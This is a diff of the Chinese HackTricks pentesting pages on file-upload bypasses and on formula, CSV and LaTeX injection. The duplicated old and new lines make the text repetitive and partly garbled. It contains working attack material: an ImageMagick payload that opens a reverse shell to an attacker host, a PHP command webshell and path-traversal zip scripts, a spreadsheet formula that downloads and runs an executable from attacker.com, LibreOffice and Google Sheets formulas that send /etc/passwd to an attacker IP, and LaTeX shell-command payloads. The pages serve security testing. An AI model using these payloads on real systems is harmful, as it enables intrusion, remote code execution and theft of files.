echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
@ -173,80 +175,80 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
2020-06-13 03:14:06 (1.96 MB/s) - AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php saved [10/10]
```
请注意,**另一个选项**,你可能正在考虑绕过这个检查的方法是让**HTTP服务器重定向到另一个文件**这样初始URL将绕过检查然后wget将使用新名称下载重定向的文件。这**不会起作用****除非**wget与参数`--trust-server-names`一起使用,因为**wget将使用原始URL中指定的文件名下载重定向的页面**。
注意,您可能正在考虑的**另一个选项**是使**HTTP服务器重定向到不同的文件**这样初始URL将绕过检查然后wget将下载重定向的文件并使用新名称。这**不会工作****除非**wget与**参数**`--trust-server-names`一起使用,因为**wget将下载重定向页面并使用原始URL中指示的文件名**。
## 工具
* [Upload Bypass](https://github.com/sAjibuu/Upload\_Bypass) 是一个强大的工具,旨在帮助渗透测试人员和漏洞猎人测试文件上传机制。它利用各种漏洞赏金技术简化识别和利用漏洞的过程确保对Web应用程序进行彻底评估。
* [Upload Bypass](https://github.com/sAjibuu/Upload\_Bypass) 是一个强大的工具,旨在帮助Pentesters和Bug Hunters测试文件上传机制。它利用各种漏洞赏金技术简化识别和利用漏洞的过程确保对Web应用程序进行全面评估。
## 从文件上传到其他漏洞
* 将**文件名**设置为`../../../tmp/lol.png`尝试实现**路径遍历**
* 将**文件名**设置为`sleep(10)-- -.jpg`,可能会实现**SQL注入**
* 将**文件名**设置为`<svg onload=alert(document.domain)>`以实现XSS
* 将**文件名**设置为`; sleep 10;`以测试一些命令注入(更多[命令注入技巧请看这里](../command-injection.md)
* [图像svg文件上传中的**XSS**](../xss-cross-site-scripting/#xss-uploading-files-svg)
* **JS**文件**上传** + **XSS** = [**Service Workers**利用](../xss-cross-site-scripting/#xss-abusing-service-workers)
* [svg上传中的**XXE**](../xxe-xee-xml-external-entity.md#svg-file-upload)
* 通过上传svg文件实现[**开放重定向**](../open-redirect.md#open-redirect-uploading-svg-files)
* 从[**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)尝试**不同的svg有效负载**
* 将**filename**设置为`../../../tmp/lol.png`并尝试实现**路径遍历**
* 将**filename**设置为`sleep(10)-- -.jpg`,您可能能够实现**SQL注入**
* 将**filename**设置为`<svg onload=alert(document.domain)>`以实现XSS
* 将**filename**设置为`; sleep 10;`以测试一些命令注入(更多[命令注入技巧在这里](../command-injection.md)
* [**XSS**在图像svg文件上传中](../xss-cross-site-scripting/#xss-uploading-files-svg)
* **JS**文件**上传** + **XSS** = [**服务工作者**利用](../xss-cross-site-scripting/#xss-abusing-service-workers)
* [**XXE在svg上传中**](../xxe-xee-xml-external-entity.md#svg-file-upload)
* [通过上传svg文件的**开放重定向**](../open-redirect.md#open-redirect-uploading-svg-files)
* 尝试来自[**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)的**不同svg有效负载**\*\*\*\*
* [著名的**ImageTrick**漏洞](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
* 如果你可以**指示Web服务器从URL中获取图像**,你可以尝试滥用[SSRF](../ssrf-server-side-request-forgery/)。如果这个**图像**将被**保存**在某个**公共**站点上,你还可以指定一个来自[https://iplogger.org/invisible/](https://iplogger.org/invisible/)的URL并**窃取每个访问者的信息**。
* [**XXE和CORS**绕过PDF-Adobe上传](pdf-upload-xxe-and-cors-bypass.md)
* 特制的PDF文件用于XSS[以下页面展示了如何**注入PDF数据以执行JS**](../xss-cross-site-scripting/pdf-injection.md)。如果你可以上传PDF文件你可以准备一些将根据给定指示执行任意JS的PDF文件
* 上传\[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt))内容以检查服务器是否有任何**防病毒软件**
* 如果您可以**指示Web服务器从URL捕获图像**,您可以尝试利用[SSRF](../ssrf-server-side-request-forgery/)。如果此**图像**将被**保存**在某个**公共**网站上,您还可以指示来自[https://iplogger.org/invisible/](https://iplogger.org/invisible/)的URL并**窃取每个访问者的信息**。
* [通过PDF-Adobe上传的**XXE和CORS**绕过](pdf-upload-xxe-and-cors-bypass.md)
* 特别制作的PDF以实现XSS[以下页面展示如何**注入PDF数据以获得JS执行**](../xss-cross-site-scripting/pdf-injection.md)。如果您可以上传PDF您可以准备一些将执行任意JS的PDF遵循给定的指示
* 上传\[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt))内容以检查服务器是否有任何**防病毒**
* 检查上传文件是否有任何**大小限制**
以下是通过上传可以实现的前10项事项列表(来自[这里](https://twitter.com/SalahHasoneh1/status/1281274120395685889)
以下是您可以通过上传实现的前10个事项(来自[这里](https://twitter.com/SalahHasoneh1/status/1281274120395685889)
1. **ASP / ASPX / PHP5 / PHP / PHP3**Webshell / RCE
2. **SVG**:存储XSS / SSRF / XXE
3. **GIF**:存储XSS / SSRF
2. **SVG**:存储XSS / SSRF / XXE
3. **GIF**:存储XSS / SSRF
4. **CSV**CSV注入
5. **XML**XXE
6. **AVI**LFI / SSRF
7. **HTML / JS**HTML注入 / XSS / 开放重定向
8. **PNG / JPEG**像素洪水攻击DoS
9. **ZIP**通过LFI实现RCE / DoS
9. **ZIP**通过LFI / DoS的RCE
10. **PDF / PPTX**SSRF / BLIND XXE
#### Burp扩展
{% embed url="https://github.com/portswigger/upload-scanner" %}
## 魔头字节
## 魔头字节
* **PNG**`"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["`
* **JPG**`"\xff\xd8\xff"`
参考[https://en.wikipedia.org/wiki/List\_of\_file\_signatures](https://en.wikipedia.org/wiki/List\_of\_file\_signatures)查看其他文件类型。
请参阅[https://en.wikipedia.org/wiki/List\_of\_file\_signatures](https://en.wikipedia.org/wiki/List\_of\_file\_signatures)以获取其他文件类型。
### ZIP/Tar文件自动解压上传
### Zip/Tar文件自动解压上传
如果你可以上传一个将在服务器内部解压缩的ZIP文件可以做两件事:
如果您可以上传一个将在服务器内部解压的ZIP可以做两件事:
#### 符号链接
#### Symlink
上传一个包含指向其他文件的软链接的链接,然后,访问解压缩的文件,你将访问到链接的文件:
上传一个包含软链接到其他文件的链接,然后,访问解压的文件时,您将访问链接的文件:
```
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt
```
### 在不同文件夹中解压
### 在不同文件夹中解压
在解压缩过程中意外在目录中创建文件是一个重要问题。尽管最初的假设是这种设置可能会防止通过恶意文件上传进行 OS 级别的命令执行,但 ZIP 存档格式的分层压缩支持和目录遍历功能可以被利用。这使得攻击者可以通过操纵目标应用程序的解压缩功能来绕过限制并逃离安全上传目录。
在解压过程中意外创建文件在目录中是一个重大问题。尽管最初假设这种设置可能会防止通过恶意文件上传进行操作系统级命令执行但ZIP归档格式的层次压缩支持和目录遍历能力可以被利用。这使得攻击者能够绕过限制通过操纵目标应用程序的解压功能逃离安全上传目录。
一个自动化利用程序可以用于创建这种文件,可以在 [**GitHub 上的 evilarc**](https://github.com/ptoomey3/evilarc) 找到。该实用程序的使用方法如下:
一个自动化的利用工具可以在 [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc) 找到。该工具的使用方法如下:
```python
# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
```
此外,**使用evilarc进行符号链接技巧**也是一种选择。如果目标是针对像`/flag.txt`这样的文件,应在您的系统中创建指向该文件的符号链接。这可以确保evilarc在操作过程中不会遇到错误。
此外,**使用 evilarc 的符号链接技巧**也是一个选项。如果目标是针对像 `/flag.txt` 这样的文件,则应在您的系统中创建指向该文件的符号链接。这确保evilarc 在操作过程中不会遇到错误。
下是用于创建恶意zip文件的Python代码示例
是用于创建恶意 zip 文件的 Python 代码示例:
```python
#!/usr/bin/python
import zipfile
@ -264,11 +266,11 @@ zip.close()
create_zip()
```
**利用压缩进行文件喷射**
**滥用压缩进行文件喷洒**
有关详细信息,请查看**原始帖子**[https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
有关更多详细信息,请**查看原始帖子**[https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
1. **创建 PHP Shell**:编写 PHP 代码以执行通过 `$_REQUEST` 变量传递的命令。
1. **创建 PHP Shell**:编写 PHP 代码以执行通过 `$_REQUEST` 变量传递的命令。
```php
<?php
@ -277,13 +279,13 @@ $cmd = ($_REQUEST['cmd']);
system($cmd);
}?>
```
2. **文件喷射和压缩文件创建**:创建多个文件,并组装一个包含这些文件的 zip 存档。
2. **文件喷洒和压缩文件创建**:创建多个文件,并组装一个包含这些文件的 zip 存档。
```bash
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php
```
3. **使用十六进制编辑器或 vi 进行修改**:使用 vi 或十六进制编辑器更改 zip 文件中文件的名称,将 "xxA" 更改为 "../" 以遍历目录。
3. **使用十六进制编辑器或 vi 进行修改**:使用 vi 或十六进制编辑器更改 zip 内部文件的名称,将 "xxA" 更改为 "../" 以遍历目录。
```bash
:set modifiable
@ -293,32 +295,32 @@ root@s2crew:/tmp# zip cmd.zip xx*.php
## ImageTragic
将此内容与图像扩展名上传以利用漏洞**(ImageMagick7.0.1-1)**(来自[exploit](https://www.exploit-db.com/exploits/39767)
将此内容与图像扩展名一起上传以利用该漏洞 **(ImageMagick , 7.0.1-1)** (来自 [exploit](https://www.exploit-db.com/exploits/39767)
```
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context
```
## 将 PHP Shell 嵌入 PNG
## 在PNG中嵌入PHP Shell
PNG 文件的 IDAT 块中嵌入 PHP Shell 可以有效地绕过某些图像处理操作。PHP-GD 中的 `imagecopyresized``imagecopyresampled` 函数在这种情况下特别相关,因为它们通常用于调整大小和重采样图像。嵌入的 PHP Shell 能够不受这些操作的影响,对于某些用例来说是一个重要优势。
PNG文件的IDAT块中嵌入PHP shell可以有效绕过某些图像处理操作。PHP-GD中的`imagecopyresized`和`imagecopyresampled`函数在此上下文中特别相关因为它们通常用于调整和重新采样图像。嵌入的PHP shell能够不受这些操作影响这在某些用例中是一个显著的优势。
关于这种技术的详细探讨,包括方法论和潜在应用,可以在以下文章中找到:["在 PNG IDAT 块中编码 Web Shell"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)。这个资源提供了对该过程及其影响的全面理解。
以下文章提供了对该技术的详细探索,包括其方法论和潜在应用:["在PNG IDAT块中编码Web Shell"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)。该资源提供了对该过程及其影响的全面理解。
更多信息请查看[https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
更多信息请[https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
## 多语言文件
多语言文件在网络安全中充当着独特的工具,作为变色龙,可以同时有效地存在于多种文件格式中。一个有趣的例子是 [GIFAR](https://en.wikipedia.org/wiki/Gifar),它是一个既可以作为 GIF 又可以作为 RAR 存档的混合体。这样的文件不仅限于这种组合;像 GIF 和 JS 或 PPT 和 JS 这样的组合也是可行的。
多语言文件在网络安全中作为一种独特工具,像变色龙一样可以同时有效地存在于多种文件格式中。一个有趣的例子是[GIFAR](https://en.wikipedia.org/wiki/Gifar)它既可以作为GIF也可以作为RAR档案。这样的文件并不限于这种配对像GIF和JS或PPT和JS的组合也是可行的。
多语言文件的核心作用在于它们能够规避基于文件类型筛选的安全措施。各种应用程序的常见做法包括仅允许上传特定文件类型,如 JPEG、GIF 或 DOC以减轻潜在有害格式如 JS、PHP 或 Phar 文件)带来的风险。然而,通过符合多种文件类型的结构标准,多语言文件可以偷偷地绕过这些限制。
多语言文件的核心实用性在于它们能够绕过基于类型筛选文件的安全措施。各种应用中的常见做法是仅允许某些文件类型上传——如JPEG、GIF或DOC——以降低潜在有害格式例如JS、PHP或Phar文件带来的风险。然而多语言文件通过符合多种文件类型的结构标准可以悄然绕过这些限制。
尽管多语言文件具有适应性,但也存在一些限制。例如,虽然一个多语言文件可能同时具有 PHAR 文件PHp ARchive和 JPEG 的特性,但其上传成功可能取决于平台的文件扩展名策略。如果系统对允许的扩展名要求严格,那么多语言文件的结构双重性可能不足以保证其上传成功
尽管它们具有适应性但多语言文件确实面临限制。例如虽然一个多语言文件可能同时包含一个PHAR文件PHp ARchive和一个JPEG但其上传的成功可能取决于平台的文件扩展名政策。如果系统对允许的扩展名要求严格仅仅是多语言文件的结构双重性可能不足以保证其上传。
更多信息请查看[https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
更多信息请[https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
## 参考资料
## 参考文献
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files)
* [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)
@ -327,22 +329,23 @@ pop graphic-context
* [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
* [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
如果您对 **黑客职业** 感兴趣并想要攻破不可攻破的系统 - **我们正在招聘!**(需要流利的波兰语书面和口语能力)。
如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_要求流利的波兰语书写和口语能力_).
{% embed url="https://www.stmcyber.com/careers" %}
{% hint style="success" %}
学习和实践AWS黑客技术<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客技术<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的 **公司在 HackTricks 中做广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在 **Twitter** 上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,18 +1,19 @@
# 公式/CSV/文档/LaTeX/GhostScript 注入
# Formula/CSV/Doc/LaTeX/GhostScript Injection
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live) 上**关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
**Try Hard Security Group**
@ -22,17 +23,17 @@
***
## 公式注入
## Formula Injection
### 信息
### Info
如果您的**输入**被**反射**在**CSV 文件**(或任何其他可能被**Excel**打开的文件)中,您可能可以放置 Excel **公式**,当用户**打开文件**或用户**在 Excel 表格内点击某个链接**时,这些公式将被**执行**
如果你的 **输入****CSV 文件**(或任何其他可能会被 **Excel** 打开的文件)中被 **反射**,你可能能够放入 Excel **公式**,这些公式将在用户 **打开文件** 或用户 **点击 Excel 表格中的某个链接** 时被 **执行**
{% hint style="danger" %}
现在**Excel 会警告**(多次)用户,当从 Excel 外部加载内容时,以防止用户进行恶意操作。因此,必须对社会工程学的最终有效载荷应用特别努力
如今 **Excel 会警告**(多次) **用户当从 Excel 之外加载某些内容**,以防止他进行恶意操作。因此,必须在最终有效载荷上特别努力进行社会工程
{% endhint %}
### [字典](https://github.com/payloadbox/csv-injection-payloads)
### [Wordlist](https://github.com/payloadbox/csv-injection-payloads)
```
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
@ -43,75 +44,75 @@ DDE ("cmd";"/C calc";"!A0")A0
```
### 超链接
**以下示例非常有用,可用于从最终的Excel表中窃取内容并向任意位置发出请求。但需要用户点击链接(并接受警告提示)。**
**以下示例非常有用,可以从最终的 Excel 表中提取内容并向任意位置发出请求。但这需要用户点击链接(并接受警告提示)。**
以下示例摘自[https://payatu.com/csv-injection-basic-to-exploit](https://payatu.com/csv-injection-basic-to-exploit)
以下示例取自 [https://payatu.com/csv-injection-basic-to-exploit](https://payatu.com/csv-injection-basic-to-exploit)
想象一下,通过CSV注入攻击利用了学生记录管理系统中的安全漏洞。攻击者的主要目的是破坏教师用于管理学生详细信息的系统。该方法涉及攻击者将恶意有效载荷注入到应用程序中,具体方法是在用于学生详细信息的字段中输入有害公式。攻击过程如下:
想象一下,学生记录管理系统中的安全漏洞通过 CSV 注入攻击被利用。攻击者的主要意图是破坏教师用于管理学生详细信息的系统。该方法涉及攻击者将恶意有效载荷注入应用程序,具体通过在用于学生详细信息的字段中输入有害公式。攻击过程如下:
1. **注入恶意有效载荷:**
* 攻击者提交学生详细信息表单,但包含一在电子表格中常用的公式(例如,`=HYPERLINK("<malicious_link>","Click here")`)。
* 公式旨在创建一个超链接,但指向攻击者控制的恶意服务器。
2. **导出受损数据:**
* 教师们不知情地使用应用程序的功能将数据导出到CSV文件中
* 当打开CSV文件时仍然包含恶意有效载荷。此有效载荷在电子表格中显示为可点击的超链接。
3. **触发攻击:**
* 教师点击超链接,认为它是学生详细信息的合法部分。
* 点击后,敏感数据(可能包括电子表格或教师计算机的详细信息)被传输到攻击者的服务器。
4. **记录数据:**
1. **注入恶意有效载荷**
* 攻击者提交学生详细信息表单,但包含一在电子表格中常用的公式(例如,`=HYPERLINK("<malicious_link>","Click here")`)。
* 公式旨在创建一个超链接,但指向攻击者控制的恶意服务器。
2. **导出被破坏的数据:**
* 教师在不知情的情况下,使用应用程序的功能将数据导出为 CSV 文件
* 当打开 CSV 文件时,仍然包含恶意有效载荷。该有效载荷在电子表格中显示为可点击的超链接。
3. **触发攻击**
* 一位教师点击超链接,认为这是学生详细信息的合法部分。
* 点击后,敏感数据(可能包括电子表格或教师计算机的详细信息)被传输到攻击者的服务器。
4. **记录数据**
* 攻击者的服务器接收并记录从教师计算机发送的敏感数据。
* 攻击者随后可以利用这些数据进行各种恶意用途,进一步危及学生和机构的隐私和安全。
* 攻击者可以利用这些数据进行各种恶意目的,进一步危害学生和机构的隐私与安全。
### RCE
**查看** [**原始帖子**](https://notsosecure.com/data-exfiltration-formula-injection-part1) **以获取更多详细信息。**
在特定配置或较旧版本的Excel中可以利用称为动态数据交换DDE的功能来执行任意命令。要利用此功能必须启用以下设置
在特定配置或较旧版本的 Excel 中,可以利用名为动态数据交换DDE的功能来执行任意命令。要利用此功能必须启用以下设置
* 转到“文件”→“选项”→“信任中心”→“信任中心设置”→“外部内容”,并启用**动态数据交换服务器启动**
* 导航到 文件 → 选项 → 信任中心 → 信任中心设置 → 外部内容,并启用 **动态数据交换服务器启动**
当打开包含恶意有效载荷的电子表格(如果用户接受警告)时,将执行有效载荷。例如,要启动计算器应用程序,有效载荷将是:
当打开带有恶意有效载荷的电子表格时(如果用户接受警告),有效载荷将被执行。例如,要启动计算器应用程序,有效载荷将是:
```markdown
=cmd|' /C calc'!xxx
```
附加命令也可以被执行,比如使用 PowerShell 下载并执行文件:
额外的命令也可以被执行,例如使用 PowerShell 下载并执行一个文件:
```bash
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
```
### LibreOffice Calc 中的本地文件包含LFI
### Local File Inclusion (LFI) in LibreOffice Calc
LibreOffice Calc 可用于读取本地文件并外泄数据。以下是一些方法:
LibreOffice Calc 可以用来读取本地文件并提取数据。以下是一些方法:
* 从本地 `/etc/passwd` 文件中读取第一行:`='file:///etc/passwd'#$passwd.A1`
* 将读取的数据外泄到攻击者控制的服务器:`=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)))`
* 外泄多行数据:`=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
* DNS 外泄(将读取的数据作为 DNS 查询发送到受攻击者控制的 DNS 服务器):`=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<attacker domain>"))`
* 从本地 `/etc/passwd` 文件读取第一行: `='file:///etc/passwd'#$passwd.A1`
* 将读取的数据提取到攻击者控制的服务器: `=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)))`
* 提取多于一行: `=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
* DNS 提取(将读取的数据作为 DNS 查询发送到攻击者控制的 DNS 服务器): `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<attacker domain>"))`
### 用于带外OOB数据外泄的 Google Sheets
### Google Sheets for Out-of-Band (OOB) Data Exfiltration
Google Sheets 提供了可用于带外数据外泄的函数:
Google Sheets 提供可以被利用进行 OOB 数据提取的函数:
* **CONCATENATE**将字符串连接在一起 - `=CONCATENATE(A2:E2)`
* **IMPORTXML**从结构化数据类型导入数据 - `=IMPORTXML(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")`
* **IMPORTFEED**导入 RSS 或 ATOM 源 - `=IMPORTFEED(CONCAT("http://<attacker IP:Port>//123.txt?v=", CONCATENATE(A2:E2)))`
* **IMPORTHTML**从 HTML 表格或列表导入数据 - `=IMPORTHTML (CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)`
* **IMPORTRANGE**从另一个电子表格导入一系列单元格 - `=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")`
* **IMAGE**将图像插入单元格 - `=IMAGE("https://<attacker IP:Port>/images/srpr/logo3w.png")`
* **CONCATENATE**: 将字符串连接在一起 - `=CONCATENATE(A2:E2)`
* **IMPORTXML**: 从结构化数据类型导入数据 - `=IMPORTXML(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")`
* **IMPORTFEED**: 导入 RSS 或 ATOM 源 - `=IMPORTFEED(CONCAT("http://<attacker IP:Port>//123.txt?v=", CONCATENATE(A2:E2)))`
* **IMPORTHTML**: 从 HTML 表格或列表导入数据 - `=IMPORTHTML (CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)`
* **IMPORTRANGE**: 从另一个电子表格导入一系列单元格 - `=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")`
* **IMAGE**: 将图像插入单元格 - `=IMAGE("https://<attacker IP:Port>/images/srpr/logo3w.png")`
## LaTeX 注入
## LaTeX Injection
通常,将在互联网上找到的用于**将 LaTeX 代码转换为 PDF**的服务器使用**`pdflatex`**。\
通常,互联网上找到将 **LaTeX 代码转换为 PDF** 的服务器使用 **`pdflatex`**。\
该程序使用 3 个主要属性来(不)允许命令执行:
* **`--no-shell-escape`****禁用** `\write18{command}` 结构,即使在 texmf.cnf 文件中启用也是如此
* **`--shell-restricted`**:与 `--shell-escape` 相同,但**限制**为一组“安全”的**预定义**\*\*命令(\*\*在 Ubuntu 16.04 中,列表位于 `/usr/share/texmf/web2c/texmf.cnf`)。
* **`--shell-escape`****启用** `\write18{command}` 结构。命令可以是任何 shell 命令。出于安全原因,通常禁止此结构。
* **`--no-shell-escape`**: **禁用** `\write18{command}` 结构,即使在 texmf.cnf 文件中启用。
* **`--shell-restricted`**: 与 `--shell-escape` 相同,但 **限制** 为一组“安全”的 **预定义** \*\*命令(\*\*在 Ubuntu 16.04 中,列表在 `/usr/share/texmf/web2c/texmf.cnf`)。
* **`--shell-escape`**: **启用** `\write18{command}` 结构。该命令可以是任何 shell 命令。出于安全原因,通常不允许此结构。
然而,还有其他执行命令的方法因此为了避免远程命令执行RCE非常重要使用 `--shell-restricted`
然而,还有其他方法可以执行命令,因此为了避免 RCE使用 `--shell-restricted` 是非常重要的
### 读取文件 <a href="#read-file" id="read-file"></a>
### Read file <a href="#read-file" id="read-file"></a>
您可能需要使用包装器进行调整,如 \[ 或 $。
您可能需要使用包装器调整注入如 \[ 或 $。
```bash
\input{/etc/passwd}
\include{password} # load .tex file
@ -144,9 +145,9 @@ Google Sheets 提供了可用于带外数据外泄的函数:
\write\outfile{Hello-world}
\closeout\outfile
```
### 命令执行 <a href="#command-execution" id="command-execution"></a>
### Command execution <a href="#command-execution" id="command-execution"></a>
命令的输入将被重定向到 stdin使用临时文件来获取它。
命令的输入将被重定向到 stdin使用临时文件来获取它。
```bash
\immediate\write18{env > output}
\input{output}
@ -169,7 +170,7 @@ Google Sheets 提供了可用于带外数据外泄的函数:
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}
```
如果遇到任何LaTex错误请考虑使用base64来获取结果,以避免出现不良字符
如果遇到任何LaTex错误请考虑使用base64来获取没有坏字符的结果
```bash
